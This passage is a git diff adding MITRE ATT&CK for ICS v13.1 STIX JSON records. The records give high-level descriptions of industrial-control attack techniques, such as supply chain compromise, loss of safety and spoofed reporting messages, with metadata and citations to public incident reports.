@@ -0,0 +1,48 @@ +{ + "type": "bundle", + "id": "bundle--8f4749a1-5360-4d0a-8ab7-d85f7797039b", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-09T18:38:51.471Z", + "name": "Execution through API", + "description": "Adversaries may attempt to leverage Application Program Interfaces (APIs) used for communication between control software and the hardware. Specific functionality is often coded into APIs which can be called by software to engage specific functions on a device or other software.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "execution" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Field Controller/RTU/PLC/IED" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [ + "Process: OS API Execution" + ], + "type": "attack-pattern", + "id": "attack-pattern--5a2610f6-9fff-41e1-bc27-575ca20383d4", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0871", + "external_id": "T0871" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--5e0f75da-e108-4688-a6de-a4f07cc2cbe3.json b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--5e0f75da-e108-4688-a6de-a4f07cc2cbe3.json new file mode 100644 index 0000000000000000000000000000000000000000..0d031fff8def89a8a3073ec536ac782b77af79fa --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--5e0f75da-e108-4688-a6de-a4f07cc2cbe3.json 
@@ -0,0 +1,63 @@ +{ + "type": "bundle", + "id": "bundle--c569336f-0805-4abe-90cf-4520a8c58ed8", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-09T18:38:51.471Z", + "name": "Supply Chain Compromise", + "description": "Adversaries may perform supply chain compromise to gain control systems environment access by means of infected products, software, and workflows. Supply chain compromise is the manipulation of products, such as devices or software, or their delivery mechanisms before receipt by the end consumer. Adversary compromise of these products and mechanisms is done for the goal of data or system compromise, once infected products are introduced to the target environment. \n\nSupply chain compromise can occur at all stages of the supply chain, from manipulation of development tools and environments to manipulation of developed products and tools distribution mechanisms. This may involve the compromise and replacement of legitimate software and patches, such as on third party or vendor websites. Targeting of supply chain compromise can be done in attempts to infiltrate the environments of a specific audience. In control systems environments with assets in both the IT and OT networks, it is possible a supply chain compromise affecting the IT environment could enable further access to the OT environment. \n\nCounterfeit devices may be introduced to the global supply chain posing safety and cyber risks to asset owners and operators. These devices may not meet the safety, engineering and manufacturing requirements of regulatory bodies but may feature tagging indicating conformance with industry standards. Due to the lack of adherence to standards and overall lesser quality, the counterfeit products may pose a serious safety and operational risk. (Citation: Control Global May 2019) \n\nYokogawa identified instances in which their customers received counterfeit differential pressure transmitters using the Yokogawa logo. 
The counterfeit transmitters were nearly indistinguishable with a semblance of functionality and interface that mimics the genuine product. (Citation: Control Global May 2019) \n\nF-Secure Labs analyzed the approach the adversary used to compromise victim systems with Havex. (Citation: Daavid Hentunen, Antti Tikkanen June 2014) The adversary planted trojanized software installers available on legitimate ICS/SCADA vendor websites. After being downloaded, this software infected the host computer with a Remote Access Trojan (RAT).", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "initial-access" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Control Server", + "Data Historian", + "Field Controller/RTU/PLC/IED", + "Human-Machine Interface", + "Input/Output Server", + "Safety Instrumented System/Protection Relay" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [ + "File: File Metadata" + ], + "type": "attack-pattern", + "id": "attack-pattern--5e0f75da-e108-4688-a6de-a4f07cc2cbe3", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0862", + "external_id": "T0862" + }, + { + "source_name": "Control Global May 2019", + "description": "Control Global 2019, May 29 Yokogawa announcement warns of counterfeit transmitters Retrieved. 
2021/04/09 ", + "url": "https://www.controlglobal.com/industrynews/2019/yokogawa-announcement-warns-of-counterfeit-transmitters/" + }, + { + "source_name": "Daavid Hentunen, Antti Tikkanen June 2014", + "description": "Daavid Hentunen, Antti Tikkanen 2014, June 23 Havex Hunts For ICS/SCADA Systems Retrieved. 2019/04/01 ", + "url": "https://www.f-secure.com/weblog/archives/00002718.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--5f3da2f3-91c8-4d8b-a02f-bf43a11def55.json b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--5f3da2f3-91c8-4d8b-a02f-bf43a11def55.json new file mode 100644 index 0000000000000000000000000000000000000000..3d877d18cf0699adcb6d83fb55cc2f62a603228c --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--5f3da2f3-91c8-4d8b-a02f-bf43a11def55.json 
@@ -0,0 +1,45 @@ +{ + "type": "bundle", + "id": "bundle--a07277a9-3fa8-4c60-bca4-34c93b05494e", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-05-08T20:13:24.241Z", + "name": "Serial Connection Enumeration", + "description": "Adversaries may perform serial connection enumeration to gather situational awareness after gaining access to devices in the OT network. Control systems devices often communicate to each other via various types of serial communication mediums. These serial communications are used to facilitate informational communication, as well as commands. Serial Connection Enumeration differs from I/O Module Discovery, as I/O modules are auxiliary systems to the main system, and devices that are connected via serial connection are normally discrete systems.\n\nWhile IT and OT networks may work in tandem, the exact structure of the OT network may not be discernible from the IT network alone. After gaining access to a device on the OT network, an adversary may be able to enumerate the serial connections. From this perspective, the adversary can see the specific physical devices to which the compromised device is connected to. 
This gives the adversary greater situational awareness and can influence the actions that the adversary can take in an attack.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "discovery" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_deprecated": true, + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows", + "Input/Output Server", + "Field Controller/RTU/PLC/IED" + ], + "x_mitre_version": "1.0", + "type": "attack-pattern", + "id": "attack-pattern--5f3da2f3-91c8-4d8b-a02f-bf43a11def55", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-ics-attack", + "url": "https://attack.mitre.org/techniques/T0854", + "external_id": "T0854" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_is_subtechnique": false + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--5fa00fdd-4a55-4191-94a0-564181d7fec2.json b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--5fa00fdd-4a55-4191-94a0-564181d7fec2.json new file mode 100644 index 0000000000000000000000000000000000000000..a441fd65ceb60ade8ecc75d822c0dfbb7e58c17f --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--5fa00fdd-4a55-4191-94a0-564181d7fec2.json 
@@ -0,0 +1,45 @@ +{ + "type": "bundle", + "id": "bundle--fd2d8ca2-b5a3-4ecf-9aaa-7368d0ff80c3", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-09T18:38:51.471Z", + "name": "Loss of Safety", + "description": "Adversaries may compromise safety system functions designed to maintain safe operation of a process when unacceptable or dangerous conditions occur. Safety systems are often composed of the same elements as control systems but have the sole purpose of ensuring the process fails in a predetermined safe manner. \n\nMany unsafe conditions in process control happen too quickly for a human operator to react to. Speed is critical in correcting these conditions to limit serious impacts such as Loss of Control and Property Damage. \n\nAdversaries may target and disable safety system functions as a prerequisite to subsequent attack execution or to allow for future unsafe conditionals to go unchecked. Detection of a Loss of Safety by operators can result in the shutdown of a process due to strict policies regarding safety systems. 
This can cause a Loss of Productivity and Revenue and may meet the technical goals of adversaries seeking to cause process disruptions.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "impact" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "None" + ], + "x_mitre_version": "1.0", + "type": "attack-pattern", + "id": "attack-pattern--5fa00fdd-4a55-4191-94a0-564181d7fec2", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0880", + "external_id": "T0880" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--63b6942d-8359-4506-bfb3-cf87aa8120ee.json b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--63b6942d-8359-4506-bfb3-cf87aa8120ee.json new file mode 100644 index 0000000000000000000000000000000000000000..c29eb098ddc66abcc84c145ed9534629292eb62e --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--63b6942d-8359-4506-bfb3-cf87aa8120ee.json 
@@ -0,0 +1,60 @@ +{ + "type": "bundle", + "id": "bundle--d0a9d581-2c34-4153-868d-6dc6d88e12e0", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-09T18:38:51.471Z", + "name": "Loss of Productivity and Revenue", + "description": "Adversaries may cause loss of productivity and revenue through disruption and even damage to the availability and integrity of control system operations, devices, and related processes. This technique may manifest as a direct effect of an ICS-targeting attack or tangentially, due to an IT-targeting attack against non-segregated environments. \n\nIn cases where these operations or services are brought to a halt, the loss of productivity may eventually present an impact for the end-users or consumers of products and services. The disrupted supply-chain may result in supply shortages and increased prices, among other consequences. \n\nA ransomware attack on an Australian beverage company resulted in the shutdown of some manufacturing sites, including precautionary halts to protect key systems. (Citation: Paganini, Pierluigi June 2020) The company announced the potential for temporary shortages of their products following the attack. (Citation: Paganini, Pierluigi June 2020) (Citation: Lion Corporation June 2020) \n\nIn the 2021 Colonial Pipeline ransomware incident, the pipeline was unable to transport approximately 2.5 million barrels of fuel per day to the East Coast. 
(Citation: Colonial Pipeline Company May 2021)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "impact" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "None" + ], + "x_mitre_version": "1.0", + "type": "attack-pattern", + "id": "attack-pattern--63b6942d-8359-4506-bfb3-cf87aa8120ee", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0828", + "external_id": "T0828" + }, + { + "source_name": "Colonial Pipeline Company May 2021", + "description": "Colonial Pipeline Company 2021, May Media Statement Update: Colonial Pipeline System Disruption Retrieved. 2021/10/08 ", + "url": "https://www.colpipe.com/news/press-releases/media-statement-colonial-pipeline-system-disruption" + }, + { + "source_name": "Lion Corporation June 2020", + "description": "Lion Corporation 2020, June 26 Lion Cyber incident update: 26 June 2020 Retrieved. 2021/10/08 ", + "url": "https://lionco.com/2020/06/26/lion-update-re-cyber-issue/" + }, + { + "source_name": "Paganini, Pierluigi June 2020", + "description": "Paganini, Pierluigi 2020, June 14 Ransomware attack disrupts operations at Australian beverage company Lion Retrieved. 2021/10/08 ", + "url": "https://securityaffairs.co/wordpress/104749/cyber-crime/ransomware-attack-hit-lion.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--648f995e-9c3a-41e4-aeee-98bb41037426.json b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--648f995e-9c3a-41e4-aeee-98bb41037426.json new file mode 100644 index 0000000000000000000000000000000000000000..70af5f2e765ebbe21e681477b796b6a140775cc7 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--648f995e-9c3a-41e4-aeee-98bb41037426.json 
@@ -0,0 +1,64 @@ +{ + "type": "bundle", + "id": "bundle--c4d92fce-374c-4d96-b456-3accab472cd3", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-09T18:38:51.471Z", + "name": "Spearphishing Attachment", + "description": "Adversaries may use a spearphishing attachment, a variant of spearphishing, as a form of a social engineering attack against specific targets. Spearphishing attachments are different from other forms of spearphishing in that they employ malware attached to an email. All forms of spearphishing are electronically delivered and target a specific individual, company, or industry. In this scenario, adversaries attach a file to the spearphishing email and usually rely upon [User Execution](https://attack.mitre.org/techniques/T0863) to gain execution and access. (Citation: Enterprise ATT&CK October 2019) \n\nA Chinese spearphishing campaign running from December 9, 2011 through February 29, 2012, targeted ONG organizations and their employees. The emails were constructed with a high level of sophistication to convince employees to open the malicious file attachments. 
(Citation: CISA AA21-201A Pipeline Intrusion July 2021)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "initial-access" + } + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Engineering Workstation", + "Human-Machine Interface", + "Control Server", + "Data Historian" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [ + "Network Traffic: Network Traffic Content", + "File: File Creation", + "Application Log: Application Log Content", + "Process: Process Creation" + ], + "type": "attack-pattern", + "id": "attack-pattern--648f995e-9c3a-41e4-aeee-98bb41037426", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0865", + "external_id": "T0865" + }, + { + "source_name": "CISA AA21-201A Pipeline Intrusion July 2021", + "description": "Department of Justice (DOJ), DHS Cybersecurity & Infrastructure Security Agency (CISA) 2021, July 20 Chinese Gas Pipeline Intrusion Campaign, 2011 to 2013 Retrieved. 2021/10/08 ", + "url": "https://us-cert.cisa.gov/sites/default/files/publications/AA21-201A_Chinese_Gas_Pipeline_Intrusion_Campaign_2011_to_2013%20(1).pdf" + }, + { + "source_name": "Enterprise ATT&CK October 2019", + "description": "Enterprise ATT&CK 2019, October 25 Spearphishing Attachment Retrieved. 2019/10/25 ", + "url": "https://attack.mitre.org/techniques/T1193/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--7374ab87-0782-41f8-b415-678c0950bb2a.json b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--7374ab87-0782-41f8-b415-678c0950bb2a.json new file mode 100644 index 0000000000000000000000000000000000000000..281191747cc5008a4c4719d8210802bf687e819e --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--7374ab87-0782-41f8-b415-678c0950bb2a.json 
@@ -0,0 +1,49 @@ +{ + "type": "bundle", + "id": "bundle--90a37c1b-68a3-4747-a1c3-89e60d087f1b", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-05-08T20:13:24.241Z", + "name": "Location Identification", + "description": "Adversaries may perform location identification using device data to inform operations and targeted impact for attacks. Location identification data can come in a number of forms, including geographic location, location relative to other control system devices, time zone, and current time. An adversary may use an embedded global positioning system (GPS) module in a device to figure out the physical coordinates of a device. NIST SP800-82 recommends that devices utilize GPS or another location determining mechanism to attach appropriate timestamps to log entries (Citation: Guidance - NIST SP800-82). While this assists in logging and event tracking, an adversary could use the underlying positioning mechanism to determine the general location of a device. An adversary can also infer the physical location of serially connected devices by using serial connection enumeration. \n\nAn adversary attempt to attack and cause Impact could potentially affect other control system devices in close proximity. 
Device local-time and time-zone settings can also provide adversaries a rough indicator of device location, when specific geographic identifiers cannot be determined from the system.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "collection" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_deprecated": true, + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows", + "Control Server" + ], + "x_mitre_version": "1.0", + "type": "attack-pattern", + "id": "attack-pattern--7374ab87-0782-41f8-b415-678c0950bb2a", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-ics-attack", + "url": "https://attack.mitre.org/techniques/T0825", + "external_id": "T0825" + }, + { + "source_name": "Guidance - NIST SP800-82", + "description": "Keith Stouffer. (2015, May). Guide to Industrial Control Systems (ICS) Security. Retrieved March 28, 2018.", + "url": "https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-82r2.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_is_subtechnique": false + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--7830cfcf-b268-4ac0-a69e-73c6affbae9a.json b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--7830cfcf-b268-4ac0-a69e-73c6affbae9a.json new file mode 100644 index 0000000000000000000000000000000000000000..395c4cd206c7d6870d7c8148bc56d7f0b3a22a53 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--7830cfcf-b268-4ac0-a69e-73c6affbae9a.json 
@@ -0,0 +1,57 @@ +{ + "type": "bundle", + "id": "bundle--6fcfe567-df5d-4ad4-9d76-87de8dd321be", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-09T18:38:51.471Z", + "name": "Drive-by Compromise", + "description": "Adversaries may gain access to a system during a drive-by compromise, when a user visits a website as part of a regular browsing session. With this technique, the user's web browser is targeted and exploited simply by visiting the compromised website. \n\nThe adversary may target a specific community, such as trusted third party suppliers or other industry specific groups, which often visit the target website. This kind of targeted attack relies on a common interest, and is known as a strategic web compromise or watering hole attack. \n\nThe National Cyber Awareness System (NCAS) has issued a Technical Alert (TA) regarding Russian government cyber activity targeting critical infrastructure sectors. (Citation: Cybersecurity & Infrastructure Security Agency March 2018) Analysis by DHS and FBI has noted two distinct categories of victims in the Dragonfly campaign on the Western energy sector: staging and intended targets. The adversary targeted the less secure networks of staging targets, including trusted third-party suppliers and related peripheral organizations. 
Initial access to the intended targets used watering hole attacks to target process control, ICS, and critical infrastructure related trade publications and informational websites.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "initial-access" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "None" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [ + "Process: Process Creation", + "Network Traffic: Network Connection Creation", + "Application Log: Application Log Content", + "File: File Creation", + "Network Traffic: Network Traffic Content" + ], + "type": "attack-pattern", + "id": "attack-pattern--7830cfcf-b268-4ac0-a69e-73c6affbae9a", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0817", + "external_id": "T0817" + }, + { + "source_name": "Cybersecurity & Infrastructure Security Agency March 2018", + "description": "Cybersecurity & Infrastructure Security Agency 2018, March 15 Alert (TA18-074A) Russian Government Cyber Activity Targeting Energy and Other Critical Infrastructure Sectors Retrieved. 2019/10/11 ", + "url": "https://us-cert.cisa.gov/ncas/alerts/TA18-074A" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--83ebd22f-b401-4d59-8219-2294172cf916.json b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--83ebd22f-b401-4d59-8219-2294172cf916.json new file mode 100644 index 0000000000000000000000000000000000000000..6e89ddf4797f143953a1da828e9ff8e2a814ad54 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--83ebd22f-b401-4d59-8219-2294172cf916.json 
@@ -0,0 +1,65 @@ +{ + "type": "bundle", + "id": "bundle--e7dde92e-8291-4f3f-80a4-5fec06f5430a", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-30T20:14:42.829Z", + "name": "Damage to Property", + "description": "Adversaries may cause damage and destruction of property to infrastructure, equipment, and the surrounding environment when attacking control systems. This technique may result in device and operational equipment breakdown, or represent tangential damage from other techniques used in an attack. Depending on the severity of physical damage and disruption caused to control processes and systems, this technique may result in [Loss of Safety](https://attack.mitre.org/techniques/T0880). Operations that result in [Loss of Control](https://attack.mitre.org/techniques/T0827) may also cause damage to property, which may be directly or indirectly motivated by an adversary seeking to cause impact in the form of [Loss of Productivity and Revenue](https://attack.mitre.org/techniques/T0828). \n\n\nThe German Federal Office for Information Security (BSI) reported a targeted attack on a steel mill under an incidents affecting business section of its 2014 IT Security Report. (Citation: BSI State of IT Security 2014) These targeted attacks affected industrial operations and resulted in breakdowns of control system components and even entire installations. As a result of these breakdowns, massive impact and damage resulted from the uncontrolled shutdown of a blast furnace. \n\nA Polish student used a remote controller device to interface with the Lodz city tram system in Poland. (Citation: John Bill May 2017) (Citation: Shelley Smith February 2008) (Citation: Bruce Schneier January 2008) Using this remote, the student was able to capture and replay legitimate tram signals. This resulted in damage to impacted trams, people, and the surrounding property. Reportedly, four trams were derailed and were forced to make emergency stops. 
(Citation: Shelley Smith February 2008) Commands issued by the student may have also resulted in tram collisions, causing harm to those on board and the environment outside. (Citation: Bruce Schneier January 2008)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "impact" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "None" + ], + "x_mitre_version": "1.1", + "type": "attack-pattern", + "id": "attack-pattern--83ebd22f-b401-4d59-8219-2294172cf916", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0879", + "external_id": "T0879" + }, + { + "source_name": "Bruce Schneier January 2008", + "description": "Bruce Schneier 2008, January 17 Hacking Polish Trams Retrieved. 2019/10/17 ", + "url": "https://www.schneier.com/blog/archives/2008/01/hacking_the_pol.html" + }, + { + "source_name": "BSI State of IT Security 2014", + "description": "Bundesamt fr Sicherheit in der Informationstechnik (BSI) (German Federal Office for Information Security) 2014 Die Lage der IT-Sicherheit in Deutschland 2014 (The State of IT Security in Germany) Retrieved. 2019/10/30 ", + "url": "https://www.bsi.bund.de/SharedDocs/Downloads/EN/BSI/Publications/Securitysituation/IT-Security-Situation-in-Germany-2014.pdf?__blob=publicationFile&v=3" + }, + { + "source_name": "John Bill May 2017", + "description": "John Bill 2017, May 12 Hacked Cyber Security Railways Retrieved. 2019/10/17 ", + "url": "https://www.londonreconnections.com/2017/hacked-cyber-security-railways/" + }, + { + "source_name": "Shelley Smith February 2008", + "description": "Shelley Smith 2008, February 12 Teen Hacker in Poland Plays Trains and Derails City Tram System Retrieved. 
2019/10/17 ", + "url": "https://inhomelandsecurity.com/teen_hacker_in_poland_plays_tr/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--8535b71e-3c12-4258-a4ab-40257a1becc4.json b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--8535b71e-3c12-4258-a4ab-40257a1becc4.json new file mode 100644 index 0000000000000000000000000000000000000000..2561e5c946e72f7c04a63ecece4386b59427e89e --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--8535b71e-3c12-4258-a4ab-40257a1becc4.json 
@@ -0,0 +1,60 @@ +{ + "type": "bundle", + "id": "bundle--e2738638-e91c-468e-9608-bf3c534fd0f9", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-30T20:19:14.351Z", + "name": "Spoof Reporting Message", + "description": "Adversaries may spoof reporting messages in control system environments for evasion and to impair process control. In control systems, reporting messages contain telemetry data (e.g., I/O values) pertaining to the current state of equipment and the industrial process. Reporting messages are important for monitoring the normal operation of a system or identifying important events such as deviations from expected values. \n\nIf an adversary has the ability to Spoof Reporting Messages, they can impact the control system in many ways. The adversary can Spoof Reporting Messages that state that the process is operating normally, as a form of evasion. The adversary could also Spoof Reporting Messages to make the defenders and operators think that other errors are occurring in order to distract them from the actual source of a problem. 
(Citation: Bonnie Zhu, Anthony Joseph, Shankar Sastry 2011) ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "evasion" + }, + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "impair-process-control" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "Control Server" + ], + "x_mitre_version": "1.2", + "x_mitre_data_sources": [ + "Windows Registry: Windows Registry Key Modification", + "Network Traffic: Network Traffic Content", + "Network Traffic: Network Traffic Flow", + "Operational Databases: Device Alarm" + ], + "type": "attack-pattern", + "id": "attack-pattern--8535b71e-3c12-4258-a4ab-40257a1becc4", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0856", + "external_id": "T0856" + }, + { + "source_name": "Bonnie Zhu, Anthony Joseph, Shankar Sastry 2011", + "description": "Bonnie Zhu, Anthony Joseph, Shankar Sastry 2011 A Taxonomy of Cyber Attacks on SCADA Systems Retrieved. 2018/01/12 ", + "url": "http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6142258" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--85a45294-08f1-4539-bf00-7da08aa7b0ee.json b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--85a45294-08f1-4539-bf00-7da08aa7b0ee.json new file mode 100644 index 0000000000000000000000000000000000000000..59f347c6faecb738c7a797de502e1411653631b5 --- /dev/null 
+++ b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--85a45294-08f1-4539-bf00-7da08aa7b0ee.json 
